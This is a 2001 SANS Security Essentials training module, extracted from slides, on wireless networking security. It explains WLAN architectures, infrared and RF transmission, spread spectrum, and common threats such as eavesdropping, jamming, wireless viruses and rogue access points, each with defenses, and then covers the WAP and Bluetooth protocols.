Wireless Networking Security by tamthinguyen

VIEWS: 145 PAGES: 40

Hello, in this module we are going to discuss wireless networking. Specifically, we'll take a look at how wireless technology works, how it is commonly deployed, and the security issues associated with using it. Because wireless communications can penetrate opaque objects such as buildings, the risk of someone accessing a private network increases markedly. With wireless, an attacker does not need to gain access to physical cables or jacks, but only needs to have an antenna and be within range of the transmissions.

More Info
									              Wireless Networking Security

                                Security Essentials
                                The SANS Institute

                           Encryption and Exploits - SANS ©2001                                   1

Hello, in this module we are going to discuss wireless networking. Specifically, we'll take a look at
how wireless technology works, how it is commonly deployed, and the security issues associated
with using it. Because wireless communications can penetrate opaque objects such as buildings, the
risk of someone accessing a private network increases markedly. With wireless, an attacker does not
need to gain access to physical cables or jacks, but only needs to have an antenna and be within
range of the transmissions.
We will focus a great deal of this discussion on wireless LANs (WLANs). For the most part we think
of these like regular LANs -- with workstations, servers, and laptops -- but without the wires.
However, it is important to remember that wireless devices include cell phones, pagers, PDAs, etc.
These less powerful devices are very widely deployed and are increasingly being used to connect to
the Internet. Further, their computational capabilities are becoming ever more sophisticated, making
the devices vulnerable to traditional Internet threats such as viruses and worms.
We will explore several aspects of wireless security in this part of the course, but before jumping in it
is interesting to note that industry analysts are projecting extreme growth in the worldwide wireless
market over the next few years. Some even speculate that the number of wireless devices accessing
the Internet will soon surpass that of wired PCs (expected to happen around 2003).

The link below points to a report by IDC that provides some interesting background on the wireless
industry, and discusses future challenges --many of which revolve around wireless security.

                   Popular Wireless Devices

             • PDAs
             • Cellular phones
             • Palmtops
             • Laptops
             • Pagers
                             Wireless Networking - SANS ©2001                                    2

The popularity of wireless devices is staggering, and the trend shows no sign of slowing. The
worldwide mobile data market is expected to be worth $80 billion by 2010. The wireless LAN
market alone is expected to grow to over US $2 billion by 2002. Further, forecasters expect more
than 1 billion wireless phones to be in use worldwide by 2003.

Any device that can interact with the Internet must be prepared to handle the hostility of the Internet
environment. Any Internet-connected node can be attacked. Further, the mounting sophistication of
wireless devices, combined with wide deployment, makes them attractive targets. As an example of
the increasing computational complexity of cell phones, consider this recent article (link below) that
likens the capabilities of today's cell phones to arcade games from the 1970s. Even more interesting
is the fact that there is an entire market evolving around networked cell phone gaming! In some cases
networked gameplay includes having cell phones accept executable code from the air. Such a
"feature" could provide a whole new avenue of entry for malicious code.

Finally, the fact that wireless transmissions are, well ... wireless, makes them vulnerable to yet
another class of threats. Attackers wishing to eavesdrop or disrupt wireless services can do so with a
RF receiver or transmitter, and do not need to gain physical access to any wires. Worse, over the
course of this discussion we will see that many of the wireless technologies in use today were not
designed with strong security in mind. Anyone using or considering WLAN technology should be
aware of the technology weaknesses, threats to wireless networks, and the available defenses.

                                Why Wireless?

      • Wireless solves problems that wired solutions cannot address
      • Users can access the network from anywhere
      • Users can be mobile while staying connected
      • Usable in environments where wires are problematic
           - Historic buildings with construction restrictions
           - Factories, assembly lines, warehouse floors, hospital
           rooms, stock trading floors
           - Temporary networks, such as for exhibitions

                             Wireless Networking - SANS ©2001                                   3

So what's so great about wireless? Why does everyone want wireless LANs? The Gartner Group,
Inc. has released a study forecasting that more than half of the Fortune 1,000 companies will have
deployed wireless LANs within the next two years. Why?
The reason is that wireless LANs provide freedom -- the freedom to move around, and freedom from
the hassles and expenses of running wires. It is sometimes more cost effective for an organization to
deploy a wireless network than to run wires through the walls of their office buildings. Further, the
convenience of having employees bring their laptops to meetings and then take them back to their
desks (without any service interruptions) is not to be underestimated. Home WLAN users enjoy
working on the computer from the living room couch or a lounge chair in the yard rather than being
confined to the home's "computer room".
Wireless networks also enable connectivity in places where it just wasn't possible before. Historic
buildings often have restrictions against punching holes in walls and ceilings. Factories and assembly
lines would typically be dangerous places to run wires, but wireless provides a solution. Wireless
allows doctors to access patient record databases while making their rounds. Warehouse workers can
carry wireless order-taking devices as they move around the warehouse checking inventories. And of
course, wireless networks can be set up and torn down quickly, making them ideal for short term
engagements like exhibitions and business meetings.
Clearly there are many cases when wireless technologies provide big advantages.

                        Wireless Vertical Markets

                 • Healthcare
                 • Retail
                 • Academia
                 • Factories
                 • Financial
                                  Wireless Networking - SANS ©2001                                   4

This slide provides some more information about how wireless technologies are being used in various industries.

• to allow doctors and nurses to communicate with network systems to gain access to patient medical records,
treatment information, and prescription information while wandering through the hospital
• to use with roving lab equipment to have it send statistics into the network patient database
Retail and Food Service
•To allow inventory information to be scanned in and update the inventory database remotely
•To allow restaurant orders to be transmitted back to the kitchen right away
•To support roaming students around campus without having to put in a wired infrastructure to provide them
with access to internal campus systems and the Internet.
• To provide wireless connectivity in environments that won’t support regular wired connections
• Stock control
• Customer pickups
• Trace inventory to the responsible parties
• Warehouse workers use wireless LANs to exchange information with central databases and increase their
• To allow traders to update exchange information right away through wireless instead of using paper and pen or
hand signals
• COMEX, Commodity Exchange, which deals in futures and options for gold, silver, platinum, palladium,
copper, and European equities uses wireless lans. The exchange uses hand-held devices where using a touch
screen information can be updated right away to the price reporting system. In the past price reporters would use
hand signals to alert a supervisor who would call the price change to a data entry clerk who would then enter the
information into a computer.
• AMEX has traders that can get current price quotes and execute trades via their hand-held devices. In the past
traders used order slips

                      Wireless LAN Network
           • Ad-hoc/Peer-to-Peer
           • Single Access Point (AP)
           • Multiple Access Points (APs)

                             Wireless Networking - SANS ©2001                                  5

Now lets talk about how wireless LANs are architected and deployed.
Typically, WLANs are configured in one of three ways: Ad-Hoc (sometimes called peer-to-peer),
Single Access Point (sometimes called one-to-local access), and Multiple Access Points (sometimes
called one-to-many access). We will consider each of these architectures in the next few slides.
 In the terminology of IEEE's 802.11 protocol standard, network architectures that do not use an
access point are called "ad hoc", and architectures that include access points are called


                            Wireless Networking - SANS ©2001                                   6

In an ad-hoc network, wireless stations communicate directly with each other. A good description is
given in the ExtremeTech article "Wireless LAN Deployment and Security Basics" referenced and
quoted below:

"In the ad-hoc network, computers are brought together to form a network "on the fly". There is no
structure to the network, there are no fixed points, and usually every node is able to communicate
with every other node. An example of a situation where an ad hoc network would be useful is a
meeting where everyone brings laptops in order to work together and share common documents.
Although it seems that order would be difficult to maintain in this type of network, algorithms such
as the "spokesman election algorithm (SEA)" have been designed to "elect" one machine as the base
station (master) of the network with the others being the slaves. Another algorithm in ad-hoc network
architectures uses a broadcast and flooding mechanism to all other nodes to establish who's who.
In an ad hoc wireless network, participating clients associate with each other through the use of a
common network identifier. Once associated, they can share files and other resources exactly as they
would in a wired peer-to-peer network. The limitations of wireless peer-to-peer networking are the
same as wired peer-to-peer networking -- administrative hassles and poor scalability. Though
convenient to set up, they are difficult to manage when you have more than just a few nodes. The
recommended practice is that ad hoc networks only be used for the smallest of networks where
convenience is paramount and security is not an issue. No doubt people can imagine that large peer-
to-peer networks could be very useful in temporary situations, such as large business meetings. In
fact, at the Fall 2001 Intel Developer Forum in San Jose, there was a technology demonstration of an
ad hoc, self-configuring wireless network that involved about 500 people in the audience all
attaching to the same network within about 10 seconds."

                           Single Access Point

                             Wireless Networking - SANS ©2001                                     7

In the configuration shown above, one or more wireless clients use an an "access point" (AP) to
connect to a wired network, and ultimately to the Internet. Typically, the AP works by forming an
"association" with the wireless clients and then acting as a bridge between the clients and the wired
network. The AP is also responsible for performing network synchronization tasks that allow the
client to interact as if it were directly connected to the wired network. An example of such a task is
the forwarding of broadcasts to the wireless LAN.
Further, the AP is responsible for authenticating wireless clients and deciding whether a particular
client should be allowed to access the network. Typically, authentication is performed based on a
"password" (more on this later) and possibly on the client's MAC address. The process of association
can be described as a handshaking mechanism between the AP and a wireless device that ensures
that the device is only connected to one AP at a time. The area surrounding the access point is
referred to as a "Basic Service Set", or BSS.

Because the wireless signal strength decreases as distance from the access point increases, client
stations that are far from the AP will experience degraded network performance. Worse, clients that
are close to the AP can sometimes monopolize the available bandwidth, leaving far away clients
starved for network resources. In order to increase the range and coverage of the wireless network, it
is necessary needs to deploy additional access points. The multiple access point configuration is
referred to as an Extended Service Set (ESS), and is described next.

                        Multiple Access Point

                            Wireless Networking - SANS ©2001                                  8

This slide shows several wireless clients connecting to the network via multiple access points. This
"one-to-many" setup allows users to roam around provided they remain within range of at least one
AP. The access points communicate amongst themselves and "hand off" the user's information as
needed. The idea is to keep the client connected to the "closest" AP regardless of how the client
moves. In this context, "closest" means the AP that is able to exchange the strongest communications
signal with the client. The client device makes the decision automatically on-the-fly based on the
strength of the beacon signals it receives from each nearby access point. The strongest signal wins.

                 Infrared Wireless Networks

            • 2 Mbps
            • Cannot penetrate opaque objects
            • Uses directed or diffused technology
                 - directed (requires line of sight)
                 - diffused (limited to short distances such as
                   a single room)

                              Wireless Networking - SANS ©2001                                     9

In wireless networks, information is transferred using electromagnetic waves, most commonly via
radio and infrared signals. Of the two, radio-based wireless networks are more commonly deployed,
as infrared signal propagation requires either a direct line of sight or a short transmission distance.
In this slide we consider the different types of Infrared wireless technology called "directed" and
"diffused". The online report entitled "Wireless Networks" (link below) provides a good description
of the two mechanisms and is reproduced below.

"Directed infrared requires a clear line of sight to make a connection. The most fmailiar direct
information communication device is the TV remote control. A connection is made by transmitting
data using two different intensities of infrared light to represent the ones and zeros. The infrared light
is transmitted in a 20 degree cone giving some flexibility in orientation of the equipment, but not
much. Some disadvantages exist with direct connections, one of which is range, usually restricted to
less than 3 meters. Also because it needs a clear line of sight, the equipment must be pointing
towards the general area of the receiver or the connection is lost. However, advantages include low
cost and a high reliable data rate.
 Diffuse infrared technology operates by flooding an area with infrared light, in much the same way
as a conventional light bulb illuminates a room. The infrared signal bounces off the walls and ceiling
so that a receiver can pick up the signal regardless of orientation. Diffuse infrared technology is a
compromise between direct infrared and radio technology. It combines the advantages of high data
rates from infrared and the freedom of movement from radio. However, it also inherits some
disadvantages. For example, although it transmits at 4Mbits/s -- twice that of current radio systems,
this must be shared among all users, unlike direct infrared. And although a user can roam around
freely, which is an advantage over direct infrared, the user is still confined to individual rooms unlike
when using radio signals, which can pass through walls."

                       Radio Frequency (RF)
                        Wireless Networks
           • Most popular WLAN technology
           • Covers longer ranges
           • Penetrates walls
           • Most use 2.4 GHz frequency range
           • Includes narrowband and spread spectrum
           • Previous versions ran at max of 2 Mbps
           • Most current versions run at 11 Mbps
           • New standards allow use at 54 Mbps
                             Wireless Networking - SANS ©2001                                  10

As noted on the previous page, radio signals have the advantage of being able to penetrate walls.
This means that the network architect has much more flexibility in deciding how the network should
be configured. Radio signal technology is what makes WLANs practical for large scale deloyment.
The report referenced on the previous page (link below) provides some interesting background on
radio technologies which will serve us well in this discussion. The relevant information is reproduced

"Radio network technology exists in two forms: narrowband technology and spread spectrum
technology. Narrowband systems transmit and receive data on a specific radio frequency; the bands
are kept as close together as possible and strong filters are used to filter out other signals to make
efficient use of the bandwidth. In order to prevent different signals from interfering with each other,
a regulatory body was set up to licence the frequencies and monitor their use. These licences are very
expensive and in the past have prevented manufacturers from using narrowband technology, an
example of a narrowband network would be a commercial radio station. In the early 1990s, the
regulatory bodies around the world set aside a band at 2.4GHz (the Instrumental, Scientific and
Medical band) for use by new technologies. This band could be used without a license making it
more accessible for private networks, and consequently manufacturers soon started to produce
products which used the new band. However, one condition of using the ISM band was that signals
must share the airwaves with one another, and as narrowband methods did not allow this, spread
spectrum technology was used instead.
Spread spectrum technology spreads the signal out over the whole band preventing concentration of
the signal in anyone place, which allows large numbers of users to share the same bandwidth. There
are two different methods involved in spread spectrum technology, Direct Sequence and Frequency
Hopping, with both having advantages and disadvantages associated with them."
Spread spectrum technologies are discussed next.

                                               6 - 10
             Spread Spectrum Technology
        DSSS (Direct Sequence Spread Spectrum)
           • Data is segmented and different segments are sent on
           different frequencies
           • Transmitter sends a redundant bit pattern called a "chip"
           along with each informational bit

       FHSS (Frequency Hopping Spread Spectrum)
           • Transmitter and receiver agree on pseudo-random
           frequency changes, called "hopping"
           • Data is sent in short sequential bursts, one burst on
           each frequency
                             Wireless Networking - SANS ©2001                                 11

Direct Sequence Spread Spectrum works by chopping the signal into small pieces and spreading
the pieces across the frequency domain. The particular "chopping algorithm" is defined by
something called the "spreading code". Only receivers who know the unique spreading code being
used can decipher the signal. In fact, the uniqueness of each spreading code is what allows multiple
DSSS transmitters to operate in the same area at the same time. Because each transmission is spread
across a wide frequency band, the per-frequency transmission power is low. Thus, "bystander" radio
users see a direct sequence transmission as low power background noise rather than interference.
The downside of having DSSS signals be low power and spread across a number of frequencies is
that the transmissions become susceptible to noise corruption. To combat noise problems, DSSS uses
redundancy to recover the signal in the case of lost data. Specifically, DSSS adds redundant
information called "chips" to the signal, usually at the rate of 10 chips per data bit. Using more
"chips" directly increases the immunity from noise interference.
On the other hand, Frequency Hopping Spread Spectrum operates by splitting the signal up across
the time domain. Short bursts of data are sequentially tranmitted on different narrowband
frequencies. The sequence of frequencies used by the transmitter (called "hops") is chosen
pseudorandomly. The receiver also knows the pseudorandom sequence, allowing it to synchronize
with the transmitter and recover each short burst of data. Other radio users see the frequency hopping
signal as short bursts of noise.
In general, Frequency Hopping devices use less power and are cheaper than Direct Sequence
devices. However, Frequency Hopping devices tend to be less resistant to interference and have
lower overall performance.

The report referenced on the previous page provides additional information.

                                               6 - 11
                        Top 5 Security Issues

            1. Eavesdropping
            2. Theft or loss of wireless devices
            3. Denial of Service (DOS)
            4. Wireless viruses
            5. Masquerading

                              Wireless Networking - SANS ©2001                                     12

At this point let us turn our attention to a few security issues that arise in all types of wireless
networks, regardless of the protocol (e.g. WAP, Bluetooth, 802.11) employed. It turns out that
wireless networks face most of the same security issues, threats and vulnerabilities as wired
networks, along with a few additional problems of their own.

                                                 6 - 12
                    Wireless Eavesdropping

           • Attackers can gain access to wireless transmissions
           without being close to the network
           • Anyone with a suitable transceiver within range of the
           signal can eavesdrop
           • Access can be gained while being hundreds of feet
           away (e.g. From a parking lot or nearby street)
           • Difficult to detect eavesdropping
           • Can gain access to confidential information
           • Loss of information can be costly
                            Wireless Networking - SANS ©2001                                 13

Eavesdropping is very easy in the radio environment. When a message is sent over the radio path,
everyone equipped with a suitable transceiver in range of the transmission can receive the message.
Worse, the wireless transceiver equipment needed to perform eavesdropping is very reasonably
priced, and it is virtually impossible to detect that someone is "listening in".
It is important to note that the frequency band and transceiver power used has a great effect on the
range where the transmission can be heard. In the case of a 2 or 5 MHz radio band and transceiver
power up to 1 W (as in the case of the current wireless LAN standards) the wireless communications
can usually be heard from outside the building where the network is operating. Attackers know this,
and will often set up their transcievers and antennas in an unmarked vehicle parked on the street in
front of the building.

                                              6 - 13
                            Protecting Against
            • Use encryption in the higher layer protocols
            • Use authentication and access control to
            prevent random strangers from being able to
            connect to the network
            • Spread spectrum technology makes it more
            difficult for an eavesdropper to makes sense of
            the transmissions
            • Prevent AP from broadcasting SSID
                             Wireless Networking - SANS ©2001                                   14

Even if an attacker can "hear" a transmission, he will not be able to make sense of the information if
it is protected by encryption. Note that, in today's networks, simply turning on WEP encryption
(discussed later) is not sufficient. Automated tools are freely available to crack WEP encryption, so it
is necessary to implement encryption in the higher layer protocols. An example of such protection
would be using IPSec, SSL, SSH, or a VPN technology.
In addition, spread spectrum implementations can provide obstacles to eavesdropping. Unless the
attacker knows the particular frequency hopping or frequency spreading mechanism being used, he
will find it difficult to recover the transmitted signal. In order to be informed of the spread spectrum
information, the attacker needs to "associate" his receiver with the access point. In order to
"associate", the client device must know the WLAN "password" called the SSID. Unfortunately,
access points typically broadcast the SSID in a beacon signal, and will further respond with the SSID
when "pinged". Thus, in practice, random strangers usually find it easy to get the spread spectrum
information they need -- they simply listen for the SSID broadcast, and then use the broadcasted
information to associate with the access point. Now the rogue client is synchronized with the spread
spectrum mechanism in use.
Note: Some access point products allow the user to disable beacon broadcasts and responses to pings.
In such a configuration, an attacker would need to obtain the SSID via some other method in order to
associate with the AP. Other AP products do not allow the beacon signals and ping response to be

                                                6 - 14
              Risks due to Theft or Loss of
                    Wireless Devices
           • Wireless devices can be stolen or lost
           • Devices can contain confidential corporate information
           • Data stored on these devices is in clear text
           • Attacker gains access to corporate network with stolen
           • Attacker gains access to corporate data on the device
           • Exposes network to possible malicious attacks and to
           Trojan horses or viruses entering the network

                             Wireless Networking - SANS ©2001                                  15

Because wireless devices are small and carried by mobile users, the devices are often lost or stolen.
An attacker who can recover a lost or stolen device gains access to all the information contained on
the device, and gains access to whatever authentication credentials the device possesses. We can
easliy imagine a situation where an attacker who steals a mobile worker's laptop gains access to
sensitive company documents, and further gains access to the company internal network by using
cryptographic keys stored on the laptop to authenticate.

                                               6 - 15
               Protecting Against Risks due to
                        Theft or Loss
            • Audit devices                           • Device Access Controls
              connecting to network                     and secure
              and create strong                         configuration
              security policies for                   • Strong authentication
              devices connecting to
                                                      • Password policies
              your network
                                                      • Anti-virus software
            • Hardware protection
                                                      • Application filtering
            • Data back-up
                                                      • Personal Use
            • Data encryption                           Restrictions

                              Wireless Networking - SANS ©2001                                   16

In order to protect against this threat, we must operate under the assumption that every wireless
device has the potential to fall into the hands of a malicious person. Our objective is to create a
security system that requires that the device be used by the right person before it will reveal its
In terms of protecting the documents, authentication credentials and other information stored on a
laptop or PDA, one potential solution would be to encrypt all data before it is written to the
filesystem. However, this scheme requires that the keys used to encrypt the data be made
inaccessible to an attacker. For example, if the keys themselves are stored in clear text on the device,
the data protection is worthless.
One way to solve the problem is to encrypt the data encryption keys themselves such that the keys
can only be unlocked by the correct user. Such a scheme must rely on a passphrase (something the
user knows), a physical key (something the user has), or biometric authentication (something the user
is) to unlock the keys that will decrypt the filesystem data.
Another useful protection mechanism revolves around the network being able to uniquely identify
each device that connects, and block access based on device identifier. If such protections are in
place, the network can begin rejecting connection attempts from a device as soon as it is reported

                                                6 - 16
                   Denial of Service Attacks

           • Attacker has a powerful enough
           transmitter that can generate radio
           interference -- jams all communication
           • Cost of buying a transmitter for this
           kind of attack isn’t expensive
           • Attack does not require specialized
           technical knowledge
                             Wireless Networking - SANS ©2001                                17

Due to the nature of radio communications, wireless LANs are vulnerable to Denial of Service
attacks based on transmission jamming. If an attacker has a powerful enough transceiver, he can
generate so much radio interference that the targeted WLAN is unable to communicate effectively.
Like eavesdropping, this kind of attack can be initiated from a distance, for example from a van
parked on the street or from an apartment in the next block. Further, the equipment needed to wage
the attack can be purchased from any electronics store at a reasonable price, and any amateur radio
enthusiast has the knowledge needed to configure the equipment.

                                              6 - 17
                      Protecting Against DoS

            • Very difficult to protect against a
            jamming denial of service attack
            • In small environments consider using
            Infrared instead of RF
            • Operate wireless networks only from
            shielded buildings
            • Locate and disable the attacking device

                              Wireless Networking - SANS ©2001                                   18

Protecting a WLAN against jamming-based denial of service attacks is difficult. The only real
solution is to implement special shielding on the building that houses the wireless network. As might
be imagined, such a solution is very expensive and is only practical for extremely high-security
sitations such as the military might require.
Recall that infrared transmissions are confined to a line of sight or a single room. Thus infrared
signals are difficult to jam even if the attacker is sitting in the same room with the wireless network.
It is impossible for an attacker who is separated from the infrared network by a wall to cause
interference. Unfortuntately however, due to the previously discussed limitations on Infrared
networks, this solution is only approriate for very small environments.
The good news is that an attacker who generates a flood of noise traffic using a radio transmitter is
very easily located. Thus, these attacks are typically of limited duration, lasting only as long as it
takes for the authorities to apprehend the miscreant.

                                                6 - 18
                              Wireless Viruses
         • Viruses affecting wireless devices have already been
         discovered in the wild
         • Timofonica is a cell phone virus that can replicate by
         sending messages to randomly dialed phone numbers
         • Phage is a virus that destroys all data and applications on
         devices running Palm OS
         • The disposable nature of handheld devices makes them
         attractive launch points for viruses and worms
         • Networked cell phone gaming may provide new avenues
         of entry for cell phone malware
                             Wireless Networking - SANS ©2001                                 19

The news articles linked below describe a cellular phone virus that surfaced in Spain during June of
2000. The virus, named Timofonica, replicated by sending messages to randomly dialed mobile
phones belonging to the European Global System for Mobile Communications network. The enabling
technology was the phone network's messaging system. It allowed one device to "push" a message to
another. When the receiving device "opened" the message, it became infected.

In September of 2000, the first virus targeting the Palm handheld operating system was discovered.
According to Sophos and Symantec, the virus completely destroys all applications and data files on a
victim system. The virus is called Phage, is only 963 bytes long, and can be acquired by running an
infected executable on the Palm. Once run, the virus seeks out other Palm applications and
overwrites them with the viral code. The only way to recover from an infection is to reset the
handheld back to its factory defaults, and re-install everything (including applications) from a

McAfee claims that over 57,000 viruses have been discovered as of Jan 2002. Thus we can be certain
that there are many people capable of writing these malicious programs. This fact, combined with the
increasing sophistication and popularity of wireless devices, implies that it is only a matter of time
before wireless viruses become a big problem. Further, some experts predict that disposable
handheld devices may one day be used to launch new viruses into the public network.
Quoting Simon Perry of Computer Associates: “The time will come when there's a reasonable
chance one of these viruses will originate from a PDA that's used to launch a virus, then gets thrown
in a dumpster..... Try tracking that down.”

                                               6 - 19
                Protecting Against Wireless
         Anti-virus protection for wireless devices is
         starting to become available
              • Trend Micro PC-cillin for Wireless
              • McAfee VirusScan Wireless
              • F-Secure AntiVirus for PalmOS, SymbianOS
              and PocketPC
              • Symantec AntiVirus for PalmOS

                             Wireless Networking - SANS ©2001                                   20

Anti-virus protection for handhelds is now being offered by the major anti-virus vendors. Some
information from Trend Micro's and McAfee's websites describing their products is reproduced
below. Experts expect antivirus software for cell phones to be made available eventually. Quoting
Gartner's John Pescatore (see article linked below): "The antivirus vendors are dying to sell antivirus
software for every cell phone."

Trend Micro http://www.antivirus.com/free_tools/wireless/
PC-cillin® for Wireless Version 2.0 for Palm OS now provides automatic real-time launch scanning
to prevent viruses that enter the device from every possible entry point - beaming, synching, email
and Internet downloading. Real-time launch scanning activates whenever applications on the device
are launched and prevents viruses from activating on the device.
McAfee http://www.mcafeeb2b.com/products/virusscan-wireless/default.asp
Not only does VirusScan Wireless offer coverage for all the major handheld device platforms, it also
gives you protection when you need it the most-when you synchronize. Your network is in the most
danger when users synchronize their PDAs with their PCs. That's when VirusScan Wireless kicks in,
scanning all files for all types of viruses and eliminating the chance of infection.
For PalmOS-based devices, such as Palm Pilots and Handspring Visors, VirusScan Wireless offers
another level of protection - on-device scanning. With on-device scanning, VirusScan Wireless can
protect your PDA from infection even when you transfer files via infrared link or access the Internet
wirelessly. VirusScan Wireless is the only solution that offers both on-device and on-sync protection
for Palm devices .
F-Secure http://www.f-secure.com/wireless/
Symantec http://www.symantec.com/sav/

                                               6 - 20

       • Rogue client pretends to be a legitimate endpoint
            - Can obtain a working IP address via DHCP or by guessing
            - Rogue client becomes a node on the internal net behind
            all firewalls
       • Rogue AP tricks clients into logging in
            - Attacker needs rogue AP to present the strongest signal
            - Allows harvesting of authentication credentials

       • Difficult to detect
                              Wireless Networking - SANS ©2001                                    21

In general, there are two types of masquerading attacks, both of which are difficult to detect.
Most commonly, an attacker pretends to be a legitimate client and simply joins the wireless network
as a normal network node. To perform this trick, the attacker only needs to associate with the
WLAN's access point (using the SSID) and obtain a working IP address for the rogue device. Often
DHCP servers are happy to provide the rogue device with an appropriate IP, it is also fairly easy for
the attacker to guess a valid IP and manually assign the address to his system. If the masquerade is
successful, the attacker's machine becomes a valid node on the WLAN, bypassing any firewall
protections that may be in place. The attacker is now free to communicate with the other systems on
the internal net, while appearing to be another interal system.
Another type of masquerading attack arises when the attacker tricks legitimate wireless clients into
thinking that a rogue access point is the one they are looking for. The only requirement is that the
attacker's access point present a stronger signal to the clients than the legitimate AP. The clients will
select, and attempt to associate with, whichever AP presents the strongest signal. From this vantage
point the attacker is able to harvest whatever authentication credentials the clients present as they
attempt to log on to the network. Note that the attacker's AP can simply deny the logon request while
squirreling away the sensitive information. Because failed logon attempts are common on wireless
LANs, the client is unlikely to notice that anything is amiss if the attacker plays his cards correctly.

                                                6 - 21
                           Protecting Against
           • Clients must be authenticated before
           being allowed to connect
           • Strong authentication mechanisms are
           best (e.g. MAC addresses can be spoofed)
           • Choose an authentication mechanism
           that will not reveal credentials to a rogue
           access point
                            Wireless Networking - SANS ©2001                                 22

In order to protect against masquerading attacks there must be some mechanism in place whereby the
client can individually authenticate with the access point before being allowed to connect. Many
access points allow clients to be authenticated according to MAC address -- while this is better than
nothing, MAC addresses can be spoofed, thus a determined attacker will be able to get around this
obstacle. To provide better protection, a strong authentication mechanism, such as one based on
public key techniques, should be employed. Whatever method is chosen, the requirements are that an
attacker not be able to spoof the credentials, and that the authentication handshaking not reveal any
sensitive client information (such as a password). The latter requirement arises from the need to
protect against information harvesting by a rogue access point.

                                              6 - 22
                           Wireless Protocols

           • WAP
           • Bluetooth
           • 802.11

                            Wireless Networking - SANS ©2001                                 23

Now let us move on to a discussion of a few popular wireless protocols. We will provide an
overview of how each protocol works and then describe a few attacks that can be levied against the
specific protocol implementation.
We will begin by discussing WAP and Bluetooth, which are two protocols often used by handheld
wireless devices. WAP is especially well suited to small, low-computation devices such as cellular
phones. Bluetooth provides a low cost, low power solution that is very widely supported, allowing
diverse types of wireless devices to communicate seamlessly.
802.11, the third protocol we will discuss, is the most popular communications standard used in
wireless LAN environments.

                                              6 - 23
         Wireless Application Protocol (WAP)

         • The WAP Forum has now formally approved WAP
         Specification v. 2.0.
         • Operates over a multitude of different wireless
         technologies: Cellular Digital Packet Data (CDPD), Code
         Division Multiple Access (CDMA) and Global System (GSM)
         • Enables a multitude of wireless devices, including cellular
         phones and PDAs, to have a common way to access the
         • Built in security at the transport layer similar to SSL

                             Wireless Networking - SANS ©2001                                   24

WAP is a protocol designed specifically to allow reduced-capability mobile devices to access the
Internet in a standardized way. Mobile devices such as cell phones and PDAs have limited display
capabilities and simple user interfaces. They further have limited processing power, battery life and
storage capabilities, and their ability to stay connected to the network is inherently unreliable. The
WAP protocol is designed to address these issues and enable sophisticated data delivery to mobile

From the July 2001 WAP Architecture Specification (see http://www.wapforum.org/):
The Wireless Application Protocol (WAP) is a result of continuous work to define an industry wide
specification for developing applications that operate over wireless communication networks. WAP
selects and defines a set of open, extensible protocols and content formats as a basis for interoperable
implementations. The WAP Forum's objectives are:
         •To bring Internet content and advanced data servies to digital cellular phones and other
         wireless terminals.
         •To create a global wireless protocol specification that will work across differing wireless
         network technologies.
         •To enable the creation of content and applications that scale across a very wide range of
         bearer networks and device types.
WAP 2.0 provides support for standard Internet protocols suchs as IP, TCP, and HTTP, optimized
for the wireless telecommunications environment.

WAP provides a built in security mechanism at the transport layer that is based on the industry
standard TLS, which is effectively SSL. The mechanism allows a wireless client to establish an end-
to-end secure connection with an Internet server. Further, security has been enhanced in the new 2.0
version of WAP, solving a few security problems present in the earlier specifications.
More information: http://news.zdnet.co.uk/story/0,,t298-s2092470,00.html

                                               6 - 24
                                The "WAP Gap"

                           WTLS                                TLS/SSL

                                        WAP Gateway                       Internet server

            • WTLS: Wireless Transport Layer Security
            • Used in versions prior to WAP 2.0
            • Requires the WAP gateway to decrypt WTLS
              transmissions and then re-encrypt as TLS/SSL
            • Sensitive data is exposed as it traverses the gateway
                              Wireless Networking - SANS ©2001                                   25

Before WAP 2.0 became available in late 2001, WAP users had to rely on the WTLS (Wireless
Transport Layer Security) protocol to provide a secure connection between wireless clients and
Internet web servers. Besides the fact that WTLS suffered from a few problems with its encryption
(see link below), security professionals were worried about the so-called "WAP gap" illustrated in
the slide above.
The WAP gap problem arises because the mechanism used to encrypt data on the airwaves is
different from the encryption understood by Internet servers. Thus, a point of translation is needed --
in this case the WAP gateway. The gateway's job is to decrypt the WTLS transmissions, and then re-
encrypt them via TLS/SSL. The problem is that sensitive information is then in the clear in the WAP
gateway's memory for a short time. If an attacker were able to take control of the gateway system, he
would be able to access all of the "secure" communications traversing the network juncture. Worse,
the WAP gateway is usually controlled by the wireless carrier, meaning that the end user can gain no
knowledge regarding the security in place at the gateway. The system requires that the client
implicitly trust that the WAP gateway is secure.
The WAP Forum's solution to the problem comes with the WAP 2.0 specification. The new spec
discards WTLS in favor of true TLS. The change means that the gateway no longer needs to act as a
translator, since Internet servers are able to interpret the TLS transmissions directly. All data remains
encrypted as it passes through the gateway. While this is good news, experts believe that it will take
some time before WAP 2.0 is widely deployed, as the new standard is significantly different from the
old one.

IBM takes a look at WAP 2.0 security in the paper linked below. The discussion includes detailed
information about how WTLS differs from TLS.

Markku-Juhani Saarinen has written a paper describing several attacks against the WAP WTLS
protocol: http://www.freeprotocols.org/harmOfWap/wtls.pdf.

                                                6 - 25
         Protecting WTLS WAP Gateways

    •    Ensure that the WAP gateway never stores decrypted
         content on secondary media
    •    Implement additional security at the higher layers
    •    Secure the WAP gateway physically so that only
         administrators have access to the system console
    •    Limit administrative access to the WAP gateway so that it is
         not available to any remote site outside the firewall
    •    Disconnect WAP applications from the rest of the network
    •    Add WAP devices to your PKI infrastructure
                             Wireless Networking - SANS ©2001                                26

If your organization is not ready to make the jump to the new WAP 2.0 specification, the
requirement for protecting the WAP gateway from compromise becomes extremely important. The
slide above gives some suggestions for protecting the gateway (assuming it is under your control to
begin with). These suggestions are discussed in greater detail in the news article linked below.

                                              6 - 26
            • Can be used to connect almost any device to another device
            • Operates in the 2.4 GHZ ISM frequency band
            • Supports a range of 30 Ft
            • Maximum Bandwidth is 1 Mb/s
            • Devices don’t need to be “line of sight”
            • Supports data, voice, and content-centric applications
            • Uses FHSS at up to 1600 hops/second
            • Signal hops among 79 frequencies at 1 MHz intervals for a high
            degree of interference immunity
            • Up to seven simultaneous connections can be established and

                             Wireless Networking - SANS ©2001                                    27

We begin our discussion of the Bluetooth protocol with a description given in a recent report:
"Bluetooth's primary strength is that it can be used to allow almost any wireless device to talk to any
other wireless device. For example, Bluetooth can work as a lower speed wireless network at a speed
that most users will find acceptable. It can also connect up to access points in hotels and in the home.
On the move it can connect to mobile phones. It can synchronize with palm format devices. In short
it can be used wherever you are - home, office, or on the move. It may not do any one solution as
well as a dedicated offering, but its overall ubiquity makes it enormously powerful. Bluetooth is also
designed to be cheap."
Reference: http://www.cellular.co.za/technologies/bluetooth/bluetooth_versus_802.htm

From the description we see that Bluetooth allows a wide range of wireless devices to interoperate.
